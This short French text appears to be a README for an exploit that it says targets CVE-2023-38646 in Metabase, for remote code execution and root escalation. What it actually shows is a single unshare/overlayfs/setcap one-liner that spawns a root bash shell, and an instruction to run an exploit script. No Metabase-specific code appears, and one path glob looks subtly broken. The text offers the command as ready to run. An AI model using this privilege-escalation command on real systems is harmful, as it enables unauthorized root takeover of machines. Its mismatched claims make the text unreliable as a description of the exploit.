
Exploit pour CVE-2023-38646 dans Metabase, réalisant une exécution de code à distance et une élévation de privilèges vers root via les techniques unshare et setuid.
Pour obtenir l'utilisateur root de la machine ou du système selon les informations ci-dessus, cette commande et ce fichier permettront d'accéder à l'utilisateur root.
Vous pouvez exécuter cette commande directement ou l'exécuter en tant que fichier. Commande : $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
Fichier exécuté : $./exploitsh.sh
Youpi !